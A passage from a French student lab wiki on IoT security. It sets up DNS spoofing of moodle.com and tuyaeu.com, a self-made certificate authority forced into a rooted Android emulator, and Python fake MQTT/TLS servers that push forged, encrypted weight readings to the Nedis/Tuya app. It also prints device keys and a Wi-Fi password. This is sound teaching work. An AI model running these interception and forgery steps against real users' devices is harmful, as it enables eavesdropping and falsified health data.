GNU nano 7.2 /etc/apache2/sites-available/secure-site.conf
<VirtualHost *:443>
ServerName moodle.com

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/apache/apache.crt
SSLCertificateKeyFile /etc/ssl/apache/apache.key

# Optionnel : log
ErrorLog ${APACHE_LOG_DIR}/ssl-error.log
CustomLog ${APACHE_LOG_DIR}/ssl-access.log combined
</VirtualHost>

# Redirection HTTP ^f^r HTTPS
<VirtualHost *:80>
ServerName moodle.com
Redirect permanent / https://moodle.com/
</VirtualHost>
</syntaxhighlight>

Maintenant, en prévision de la suite (voir explication dans Machine virtuelle Android), on va créer une autorité de certification nommée CertiFiable :

<code>openssl req -x509 -new -nodes -keyout ca.key -sha256 -days 365 -out ca.crt -subj "/CN=CertiFiable"</code>

Puis, on vient générer une demande de signature de certificat :

<code>openssl req -new -newkey rsa:2048 -nodes -keyout apache.key -out apache.csr -subj "/CN=moodle.com"</code>

Enfin, on vient signer le site avec le certificat de CertiFiable :

<code>openssl x509 -req -in apache.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out apache.crt -days 365 -sha256</code>

= Machine virtuelle <code>android</code> =

== Première tentative ==
Actuellement, si on navigue sur internet et que l'on se rend sur moodle.com, on atterrit bien sûr le faux Moodle, mais comme le téléphone ne connait pas l'autorité de certification nommé CertiFiable, on a le droit à ce magnifique message de connexion non sécurisée :

[[Fichier:Avertissement moodle.png|sans_cadre]][[Fichier:Moodle le magnifique.png|sans_cadre]]

Malheureusement, il est aujourd'hui impossible d'ajouter facilement une autorité de certification sur son téléphone.

C'est pour cela qu'une solution proposée est d'installer une machine virtuelle d'une ancienne version d'<code>Android</code> où il était possible d'en ajouter.

En ayant suivi ce tuto (https://help.clouding.io/hc/en-us/articles/4405454393756-How-to-virtualize-Android-with-QEMU-KVM), j'ai réussi à installer une VM sur Zabeth4 (j'ai dû prendre une autre iso car celle du site était inaccessible).

J'ai installé <code>VNC Viewer</code> pour pouvoir manipuler la machine virtuelle.

En étant sur la VM, j'ai pu me rendre compte qu'il n'était pas possible de se connecter au WiFi, c'est la connexion du pc qui est simulé comme un réseau WiFi dans la VM.

J'ai pu réfléchir à deux solutions avant que la VM ne crash d'elle-même et soit impossible à redémarrer...

La première est toute simple, connecter la Zabeth directement au WiFi, ce qui est difficile à distance. La seconde, qui est je pense possible, est de changer la carte réseau dans les fichiers de conf de la VM pour mettre celle supportant le WiFi.

Je n'ai donc pu tester aucune de ces deux solutions, la VM n'étant plus.

== Seconde tentative ==

Pour cette seconde tentative, j'utilise les commandes suivantes avec plusieurs ISO Android.<syntaxhighlight lang="linux-config">
qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw
qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw -cdrom *android-x86*.iso -boot d
qemu-system-x86_64 -m 2048 -enable-kvm -cpu host -smp 2 -display sdl -drive file=android.img,format=raw,if=virtio -usb -device usb-host,vendorid=0x148f,productid=0x5370
</syntaxhighlight>J'ai pu donc pu faire face:

- À un ISO sans les services Google et sans navigateur ...

- Un trop ancien pour Nedis

- Un qui refuse l'installation d'APK

- Un trop récent pour l'installation de certificat.

- Un qui refuse de se laisser root

En fin de séance, je n'ai malheureusement pas de VM Android fonctionnelle.

== Ultime tentative (qui marche) ==
Cette fois ci j'utilise l'application Android Studio qui permet d'émuler des téléphones Android pour le débogage d'application. On va donc s'en servir pour créer un Android routé qui va recevoir notre certificat.

Dans un premier temps j'ai donc routé mon téléphone avec l'utilitaire Magisik en suivant ce tutoriel : https://www.youtube.com/watch?v=QzsNn3GhYYk&t=374s.

Puis je viens ajouter un module dans Magisk qui permet de recharger à chaque demarrage du téléphone le certificat en question.

Le certificat peut être ajouter dans le téléphone en utilisant la commande <code>adb push xyzxyzxyz.0</code> .

La manipulation est la suivante :<syntaxhighlight lang="linux-config">
adb shell
su
cd /data/adb/modules/
mkdir -p tuya_cert/system/etc/security/cacerts
echo "id=tuya_cert" > tuya_cert/module.prop echo "name=Tuya Certificate Injection" >> tuya_cert/module.prop echo "version=1.0" >> tuya_cert/module.prop echo "versionCode=1" >> tuya_cert/module.prop echo "author=Victo" >> tuya_cert/module.prop echo "description=Injecte le certificat Tuya dans le systeme" >> tuya_cert/module.prop
touch tuya_cert/auto_mount
cp /sdcard/Download/26e33623.0 /data/adb/modules/tuya_cert/system/etc/security/cacerts/
chmod 644 /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
chown root:root /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
reboot
</syntaxhighlight>On a donc maintenant une VM Android avec notre certificat. Il faut maintenant que le PC qui host cette VM soit connecté à notre borne WiFi pour pouvoir constater que notre site Moodle.com est bien redirigé et sécurisé.

= Machine <code>Android</code> (06/10) =
Pour cette dernière partie, j'ai retrouvé une tablette sous <code>Android 4.4 KitKat</code> qui permet d'ajouter des autorités de certification.

C'est donc ce que j'ai fait :

[[Fichier:Photo_certifiable.png|sans_cadre]]

Maintenant, on constate en se connectant sur moodle.com à partir de cette tablette que l'on est bien redirigé vers le faux site et qu'il est sécurisé avec le magnifique cadenas vert.

[[Fichier:Photo moodle.png|sans_cadre]]

(cette page web date du 06/10/25, elle n'est plus valable depuis le 10/10/25...)

= Nedis Wi-Fi Smart Personal Scales =

Dans ce second TP, nous allons jouer avec ce pèse personne de nedis.

Dans un premier temps, j'ai connecté la balance au réseau SE5-SSID10.

Puis j'ai remarqué que quand je tentais de me peser, la balance affichait err2.

Après une courte investigation, il s'agit d'une balance qui émet des signaux électriques pour analyser la composition corporelle donc si on se pèse avec des chaussures, cela pose problème.

Pour la suite du projet, on se pèsera avec les mains.

[[Fichier:Poid_sur_app_nedis.png|sans_cadre]]

== Redirection du poids vers notre serveur ==
Dans un premier temps, mon idée était de faire croire à la balance qu'elle communique effectivement avec son serveur pour pouvoir récupérer les informations sur la santé de l'utilisateur.

Ici on constate sur ces paquets la requête de la balance pour obtenir une IP, puis le moment ou elle l'obtient.

[[Fichier:WS connection balance.png|sans_cadre|858x858px]]

Je peux donc ping ma balance depuis mon pc (celui qui host ma VM android)

[[Fichier:PIng balance.png|sans_cadre]]

Maintenant je veux voir les messages de communication entre la balance, son serveur et l'application, pour ce faire je fais <code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">
14:46:51.115996 IP 172.16.10.105.49153 > 172.16.10.1.53: 13861+ A? m2.tuyaeu.com. (31)
14:46:51.125611 IP 172.16.10.1.53 > 172.16.10.105.49153: 13861 3/0/0 A 3.120.92.134, A 18.184.31.90, A 35.156.44.172 (79)
14:46:51.168250 IP 172.16.10.105.49153 > 172.16.10.1.53: 59035+ A? a3.tuyaeu.com. (31)
14:46:51.177967 IP 172.16.10.1.53 > 172.16.10.105.49153: 59035 3/0/0 A 18.198.62.99, A 18.158.227.228, A 3.67.116.46 (79)
14:46:51.703179 IP 172.16.10.102.57661 > 172.16.10.1.53: 30982+ AAAA? a1.tuyaeu.com. (31)
14:46:51.706085 IP 172.16.10.102.57662 > 172.16.10.1.53: 15654+ A? a1.tuyaeu.com. (31)
14:46:51.713159 IP 172.16.10.1.53 > 172.16.10.102.57661: 30982 3/0/0 AAAA 2a05:d014:afa:af02:262a:be09:e328:ff21, AAAA 2a05:d014:afa:af01:87dc:dc67:35a1:5bfe, AAAA 2a05:d014:afa:af00:1ee2:1f00:e061:e8bf (115)
14:46:51.715736 IP 172.16.10.1.53 > 172.16.10.102.57662: 15654 3/0/0 A 3.78.92.3, A 35.159.150.3, A 3.121.33.91 (79)

56 packets captured
56 packets received by filter
0 packets dropped by kernel
[4343449.827028] device eth1 left promiscuous mode

</syntaxhighlight>visiblement notre balance communique avec tuya via m2.tuyaeu.com et a3.tuyaeu.com. Par la suite on constate qu'elle communique avec une multitude de XY.tuyaeu.com.

Maintenant on refait une config similaire à moodle.com, une zone "tuyaeu.com" dans le fichier de conf de bind, un fichier db.tuyaeu.com et une page apache. Enfin on vient la signer avec notre autorité de certification.

<code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">

12:30:58.490060 IP 172.16.10.105.49153 > 172.16.10.1.53: 50294+ A? m2.tuyaeu.com. (31)
12:30:58.490174 IP 172.16.10.1.53 > 172.16.10.105.49153: 50294* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:30:58.540041 IP 172.16.10.105.49153 > 172.16.10.1.53: 23785+ A? a3.tuyaeu.com. (31)
12:30:58.540132 IP 172.16.10.1.53 > 172.16.10.105.49153: 23785* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)

</syntaxhighlight>Maintenant on constate que quand la balance demande l'adresse du serveur xy.tuyaeu.com, notre DNS lui répond avec l'IP de notre serveur.

On va créer un faux serveur pour déchiffrer ce que nous dit la balance.<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# openssl s_server -accept 8886 -cert /etc/ssl/apache/ca.crt -key /etc/ssl/apache/ca.key -debug
Using default temp DH parameters
ACCEPT
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
</syntaxhighlight>On constate que dès que la balance tente de se connecter elle ferme la connexion pour cause "no shared cipher".

Malheureusement, je constate (un peu tard) que notre balance ne pourra pas communiquer avec notre serveur puisque qu'elle ne possède pas le certificat de notre autorité de certification. Elle refuse donc de communiquer avec notre serveur.

Il faudrait réussir un injecter le certificat dans la balance en communicant directement avec elle.

== Envoi de fausses informations vers l'application ==

TODO redaction

L'appli tape sur 443 et 8883 (mqtt qui fonctionne avec tls) comme on peut le voir sur cet extrait:<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# tcpdump -i eth1 -n src 172.16.10.102 and not port 53

...

11:59:46.829382 IP 172.16.10.102.53314 > 172.16.10.1.443: Flags [.], ack 1257, win 251, length 0
11:59:47.005041 IP 172.16.10.102.54915 > 172.16.10.255.54915: UDP, length 263
11:59:47.295737 IP 172.16.10.102.53313 > 172.16.10.1.8883: Flags [S], seq 3014816869, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
11:59:47.346713 IP 172.16.10.102.53315 > 172.16.10.1.443: Flags [S], seq 1755898328, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
11:59:47.347853 IP 172.16.10.102.53315 > 172.16.10.1.443: Flags [.], ack 273869652, win 255, length 0
11:59:47.534641 IP 172.16.10.102.53318 > 172.16.10.1.443: Flags [F.], seq 547, ack 1257, win 251, length 0

...

11:59:48.189587 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [P.], seq 517:547, ack 1256, win 251, length 30
11:59:48.190681 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [.], ack 1257, win 251, length 0
11:59:48.256593 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [F.], seq 547, ack 1257, win 251, length 0
11:59:48.324124 IP 172.16.10.102.53313 > 172.16.10.1.8883: Flags [S], seq 3014816869, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0

</syntaxhighlight>

On va donc tenter d'envoyer des informations erronés de notre serveur vers notre application.

Dans un premier temps on va tenter d'établir une connexion sécurisé entre l'appli et notre serveur.

Tuya utilise un protocole MQTT pour les échanges de données. On va donc simuler un serveur MQTT en python qui utilise un certificat signé par notre autorité de certification.<syntaxhighlight lang="python3">
import socket
import ssl

CERT_FILE = "/etc/apache2/ssl/tuya.crt"
KEY_FILE = "/etc/apache2/ssl/tuya.key"
PORT = 8883

def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
except Exception as e:
print(f"impossible de charger les clés SSL\n{e}")
return

bindsocket = socket.socket()
bindsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
bindsocket.bind(('0.0.0.0', PORT))
bindsocket.listen(5)

print(f"faux Serveur MQTT en écoute sur le port {PORT}...")
print("en attente de l'application Android...")

while True:
try:
newsocket, fromaddr = bindsocket.accept()
print(f"\nconnexion TCP reçue de {fromaddr[0]}")

try:
conn = context.wrap_socket(newsocket, server_side=True)
print(f"handshake SSL réussi")

data = conn.recv(1024)
print(f"données reçues ({len(data)} octets) :")
print(data)

except ssl.SSLError as e:
print(f"échec SSL rejet du certificat.\n{e}")
except Exception as e:
print(f"erreur de lecture : {e}")
finally:
pass

except KeyboardInterrupt:
print("\narrêt.")
break

if __name__ == '__main__':
start_server()
</syntaxhighlight><syntaxhighlight lang="linux-config">
connexion TCP reçue de 172.16.10.102
handshake SSL réussi
données reçues (529 octets) :
b'\x10\x8e\x04\x00\x04MQTT\x04\xce\x00<\x00lcom.nedis.smartlife_mb_e5a1220d6003e352f8b34a81cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc_DEFAULT\x00\x0ftuya/smart/will\x00\xfa{"clie
ntId":"com.nedis.smartlife_mb_e5a1220d6003e352f8b34a81cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc_DEFAULT","deviceType":"ANDROID","message":"","userName":"e5a1220d6003e352f8b34a81
cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc"}\x00up1027735_v1_4dtc78phe7grtfdfv7fp_a4206d71_mb_eu17623708062605mpDdzpA355dad9b8086f63442d98e227e039cf5315158b056398c8fb\x00\x10388c
a5a77b82c5ad'
</syntaxhighlight>On constate à la suite de cela que notre application fait totalement confiance à notre faux serveur. Il faut maintenant le format sous lequel envoyer notre message pour quelle ajoute un poids dans l'application.
On tente donc d'envoyer en clair le poid vers l'application nedis<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# cat fake_serv2.py
import socket
import ssl
import time
import json
import struct

# ================= CONFIGURATION =================
CERT_FILE = "/etc/ssl/apache/ssl/tuya.crt"
KEY_FILE = "/etc/ssl/apache/ssl/tuya.key"
PORT = 8883

PAYLOAD_POIDS = {
"protocol": 4,
"t": int(time.time()),
"data": {
"dps": {
"1": 8050,
"2": True,
"3": "kg"
}
}
}
# =================================================

def encode_remaining_length(length):
out = bytearray()
while True:
byte = length % 128
length //= 128
if length > 0:
byte |= 0x80
out.append(byte)
if length == 0:
break
return out

def create_mqtt_packet(pkt_type, flags, payload):
header = bytes([(pkt_type << 4) | flags])
return header + encode_remaining_length(len(payload)) + payload

def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)

sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", PORT))
sock.listen(5)

print(f"[*] Serveur MQTT TLS prêt sur {PORT}")

while True:
client, addr = sock.accept()
print(f"\n[+] Connexion de {addr[0]}")

try:
conn = context.wrap_socket(client, server_side=True)
print("✅ TLS OK")

while True:
header = conn.recv(1)
if not header:
break

pkt_type = header[0] >> 4

# Remaining length
multiplier = 1
remaining_len = 0
while True:
b = conn.recv(1)[0]
remaining_len += (b & 127) * multiplier
multiplier *= 128
if not (b & 128):
break

payload = b""
while len(payload) < remaining_len:
payload += conn.recv(remaining_len - len(payload))

# ================= HANDLERS =================

# CONNECT
if pkt_type == 1:
print(">>> CONNECT reçu")
conn.send(b"\x20\x02\x00\x00")
print("<<< CONNACK envoyé")

# SUBSCRIBE
elif pkt_type == 8:
msg_id = payload[0:2]
topic_len = struct.unpack("!H", payload[2:4])[0]
topic = payload[4:4+topic_len].decode(errors="ignore")

print(f">>> SUBSCRIBE : {topic}")

# SUBACK (QoS 1 accepté)
suback_payload = msg_id + b"\x01"
conn.send(create_mqtt_packet(9, 0x00, suback_payload))
print("<<< SUBACK OK")

# Mapping OUT -> IN
pub_topic = topic.replace("/out/", "/in/")
print(f"📡 Publication sur : {pub_topic}")

time.sleep(0.5)

json_payload = json.dumps(PAYLOAD_POIDS)
topic_bytes = pub_topic.encode()

var_header = struct.pack("!H", len(topic_bytes)) + topic_bytes
packet_payload = var_header + json_payload.encode()

# PUBLISH QoS 1
packet = create_mqtt_packet(3, 0x02, packet_payload)
conn.send(packet)

print(f"🚀 Payload envoyé (NON chiffré)")

# PINGREQ
elif pkt_type == 12:
conn.send(b"\xd0\x00")

else:
print(f"ℹ️ Packet MQTT type {pkt_type} ignoré")

except Exception as e:
print(f"❌ Erreur connexion : {e}")

finally:
try:
conn.close()
except:
pass

if __name__ == "__main__":
start_server()

</syntaxhighlight>

On cherche dans le fichier shared_prefs dans le /data/data/com.nedis.smartlife une clé local qui permettrai de chiffrer le message pour que nedis l'accepte.<syntaxhighlight lang="linux-config">
emulator64_x86_64_arm64:/data/data/com.nedis.smartlife/shared_prefs # grep -r "localKey"

./sig_mesh_storage.xml: <string name="sig_mesheu176237y8062605m7Ddzpr3a6d803edeb314f364c55d2caab540918">[{"appkey":"2FC5C9F42A44F9D243F960231C370DC6","code":"mebf11e37fc6632a9b44qg","endTime":0,"ivIndex":0,"key":"mebf11e37fc6632a9b44qg","localKey":"674d29fb978a1705","meshId":"mebf11e37fc6632a9b44qg","meshKey":"2FC5C9F42A44F9D243F960231C370DC6","meshkey":"2FC5C9F42A44F9D243F960231C370DC6","name":"D8FBEEA2F2B93F4B63EFD7DA83424BA9","netWorkkey":"D8FBEEA2F2B93F4B63EFD7DA83424BA9","password":"fa1667ca872e46d4","pv":"2.1","resptime":0,"share":false,"startTime":0,"tempShare":false}]</string>
</syntaxhighlight><syntaxhighlight lang="linux-config">
#!/usr/bin/env python3
import socket
import ssl
import time
import json
import struct
import base64
import hashlib
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

# ================= CONFIG =================
CERT_FILE = "/etc/ssl/apache/ssl/tuya.crt"
KEY_FILE = "/etc/ssl/apache/ssl/tuya.key"
PORT = 8883

# 🔑 LOCAL KEY 16 caractères
LOCAL_KEY = b"674d29fb978a1705"

# DPS balance (poids correct pour Nedis)
DPS_POIDS = {
"1": 8050, # 80.50 kg
"2": 1, # stable
"3": "kg"
}
# =========================================

# ---------- TUYA CRYPTO ----------
def tuya_encrypt(data: dict, local_key: bytes) -> str:
raw = json.dumps(data, separators=(',', ':')).encode()
cipher = AES.new(local_key, AES.MODE_ECB)
encrypted = cipher.encrypt(pad(raw, 16))
return base64.b64encode(encrypted).decode()

def tuya_sign(enc_data: str, ts: int, local_key: bytes) -> str:
s = f"data={enc_data}&t={ts}&key={local_key.decode()}"
return hashlib.md5(s.encode()).hexdigest()

def build_tuya_payload(dps: dict, device_id: str) -> dict:
ts = int(time.time())
enc = tuya_encrypt({
"devId": device_id,
"dps": dps
}, LOCAL_KEY)
sign = tuya_sign(enc, ts, LOCAL_KEY)
return {
"protocol": 4,
"t": ts,
"data": enc,
"sign": sign
}

def extract_device_id(topic: str) -> str:
return topic.split("/")[-1]

# ---------- MQTT UTILS ----------
def encode_remaining_length(length):
out = bytearray()
while True:
byte = length % 128
length //= 128
if length > 0:
byte |= 0x80
out.append(byte)
if length == 0:
break
return out

def create_mqtt_packet(pkt_type, flags, payload):
header = bytes([(pkt_type << 4) | flags])
return header + encode_remaining_length(len(payload)) + payload

# ---------- SERVER ----------
def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)

sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", PORT))
sock.listen(5)

print(f"[*] Serveur MQTT TLS Tuya prêt sur {PORT}")

published_topics = set()

while True:
client, addr = sock.accept()
print(f"\n[+] Connexion de {addr[0]}")

try:
conn = context.wrap_socket(client, server_side=True)
print("✅ TLS OK")

while True:
header = conn.recv(1)
if not header:
break

pkt_type = header[0] >> 4

# Remaining length
multiplier = 1
remaining_len = 0
while True:
b = conn.recv(1)[0]
remaining_len += (b & 127) * multiplier
multiplier *= 128
if not (b & 128):
break

payload = b""
while len(payload) < remaining_len:
payload += conn.recv(remaining_len - len(payload))

# -------- HANDLERS --------
if pkt_type == 1: # CONNECT
print(">>> CONNECT")
conn.send(b"\x20\x02\x00\x00") # CONNACK OK

elif pkt_type == 8: # SUBSCRIBE
msg_id = payload[0:2]
topic_len = struct.unpack("!H", payload[2:4])[0]
topic = payload[4:4+topic_len].decode(errors="ignore")

print(f">>> SUBSCRIBE : {topic}")
conn.send(create_mqtt_packet(9, 0x00, msg_id + b"\x01")) # SUBACK QoS 1

# Publication automatique
device_id = extract_device_id(topic)
tuya_payload = build_tuya_payload(DPS_POIDS, device_id)
json_payload = json.dumps(tuya_payload)

topic_bytes = topic.encode()
var_header = struct.pack("!H", len(topic_bytes)) + topic_bytes
packet_payload = var_header + json_payload.encode()

# PUBLISH QoS 1
packet = create_mqtt_packet(3, 0x02, packet_payload)
time.sleep(0.5)
conn.send(packet)
print("🚀 POIDS TUYA CHIFFRÉ ENVOYÉ")

elif pkt_type == 4: # PUBACK
print("<<< PUBACK")

elif pkt_type == 10: # UNSUBSCRIBE
msg_id = payload[0:2]
conn.send(create_mqtt_packet(11, 0x00, msg_id))
print("<<< UNSUBACK")

elif pkt_type == 12: # PINGREQ
conn.send(b"\xd0\x00")

else:
print(f"ℹ️ MQTT type {pkt_type} ignoré")

except Exception as e:
print(f"❌ Erreur : {e}")

finally:
try:
conn.close()
except:
pass

if __name__ == "__main__":
start_server()

</syntaxhighlight>Pour autant, le poid n'est toujours pas visible dans l'application

Application smart life : a1-eu.lifeaiot.com. m1-eu.lifeaiot.com. m1-eu.lifeaiot.com.

SE5 IdO sécurité des objets 2025/2026 b1

2025-12-16T16:37:23Z

Vdetrez : /* Envoi de fausses informations vers l'application */

[[Fichier:1107px-Titre page.png|sans_cadre|820x820px]]

= Serveur virtuel (17/09) =
Dans un premier temps, on vient créer un serveur virtuel sur <code>capbreton</code> avec la commande <code>xen-create-image --hostname=SE5.vdetrez --dhcp --dir=/usr/local/xen --size=10G --memory=2G --dist=daedalus --bridge=bridgeStudents</code>

Ensuite, sur capbreton dans le dossier <code>/etc/network/interfaces.d</code> on vient créer un fichier <code>g1_vdetrez</code> pour mettre en place une nouvelle interface dans le VLAN 410. <syntaxhighlight lang="linux-config">
auto Trunk.410
iface Trunk.410 inet manual
vlan-raw-device Trunk
up ip link set $IFACE up
down ip link set $IFACE down

auto g1_vdetrez
iface g1_vdetrez inet manual
bridge_ports Trunk.410
up ip link set $IFACE up
down ip link set $IFACE down

</syntaxhighlight>

On a maintenant accès à la machine SE5.vdetrez (en ayant évidemment fait l'erreur de mettre "." à la place de "-") et on vient y configurer nos adresses IPv4.

Mon adresse IPv4 routée est la <code>172.26.145.100</code> et mon IPv4 dans le VLAN 410 est <code>172.16.10.0</code> <syntaxhighlight lang="linux-config">
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
address 172.26.145.110
netmask 255.255.255.0
gateway 172.26.145.251
# post-up ethtool -K eth0 tx off

auto eth1
iface eth1 inet static
address 172.16.10.0/24
#
# The commented out line above will disable TCP checksumming which
# might resolve problems for some users. It is disabled by default
#

</syntaxhighlight>

On vérifie avec la commande <code>ip a</code><syntaxhighlight lang="linux-config">
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:41 brd ff:ff:ff:ff:ff:ff
inet 172.26.145.110/24 brd 172.26.145.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 2001:660:4401:6050:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 853sec preferred_lft 753sec
inet6 2a01:c916:2047:c850:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 2591853sec preferred_lft 604653sec
inet6 fe80::216:3eff:fe23:7441/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:42 brd ff:ff:ff:ff:ff:ff
inet 172.16.10.0/24 brd 172.16.10.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe23:7442/64 scope link
valid_lft forever preferred_lft forever

</syntaxhighlight>

Et on constate que notre serveur a accès à Internet avec la commande <code>ping 8.8.8.8</code>

= Point d'accès WiFi (29/09) =
Pour l'instant, nous mettons de côté ce point du TP car il n'est pas utile pour la suite.

= Sécurisation WiFi par WPA2-PSK =

Pour communiquer avec le routeur <code>Cisco</code>, on branche le port série en USB et on se connecte avec la commande <code>minicom -D /dev/ttyUSB0 -b 9600</code>. La première étape fut la création du SSID <code>SE5-SSID10</code>.<syntaxhighlight lang="linux-config">
dot11 ssid SE5-SSID10

vlan 410

authentication open

authentication key-management wpa version 2

wpa-psk ascii Cisco2025

exit
</syntaxhighlight>
Puis, on configure l'interface <code>Dot11Radio0</code><syntaxhighlight lang="linux-config">
interface dot11radio 0

encryption mode ciphers aes-ccm

ssid SE5-SSID10

station-role root

no shutdown
</syntaxhighlight>Après cela, on retourne sur notre serveur virtuel et on y implémente un serveur DHCP pour l'attribution des IP aux machines se connectant sur le routeur. On retrouve cette configuration dans <code>/etc/dhcp/dhcpd.conf</code><syntaxhighlight lang="linux-config">
# dhcpd.conf

option domain-name "plil.info";
option domain-name-servers ns.plil.info;

default-lease-time 600;
max-lease-time 7200;

ddns-update-style none;

authoritative;

subnet 172.16.10.0 netmask 255.255.255.0 {
range 172.16.10.100 172.16.10.200;
option domain-name-servers 172.16.10.1;
option routers 172.16.10.1;
default-lease-time 600;
max-lease-time 7200;
}
</syntaxhighlight>Puis, on implémente un serveur DNS minimal dans le fichier <code>/etc/bind/named.conf.options</code><syntaxhighlight lang="linux-config">
options {
directory "/var/cache/bind";

recursion yes;
allow-query {172.16.10.0/24; 127.0.0.1;};

forwarders {
8.8.8.8;
1.1.1.1;
};

dnssec-validation auto;

listen-on {127.0.0.1; 172.16.10.1;};
listen-on-v6 { none; };
};
</syntaxhighlight>Et enfin, on met en place une mascarade entre le VLAN 410 et le routeur du réseau des salles de projets pour donner l'accès à Internet.<syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

= Interception de flux (30/09) =

== Redirection par DNS ==
Pour cette partie, on va ajouter une zone primaire à notre serveur DNS avec le nom Internet du site que l'on veut rediriger vers notre machine.

Ici, ce sera le merveilleux <code>moodle.com</code>

D'abord, on modifie <code>/etc/bind/named.conf.local</code><syntaxhighlight lang="linux-config">
//
// Do any local configuration here
//

// Consider adding the 1918 zones here, if they are not used in your
// organization
//include "/etc/bind/zones.rfc1918";

zone "moodle.com" {
type master;
file "/etc/bind/db.moodle.com";
};
</syntaxhighlight>Puis, on crée la fameuse zone <code>db.moodle.com</code> dans le même répertoire <syntaxhighlight lang="linux-config">
$TTL 200
@ IN SOA ns.moodle.com. admin.moodle.com. (
5 ;
3600 ;
1800 ;
604800 ;
86400 ;
)
IN NS ns.moodle.com.
ns IN A 172.16.10.1
@ IN A 172.16.10.1
www IN CNAME ns
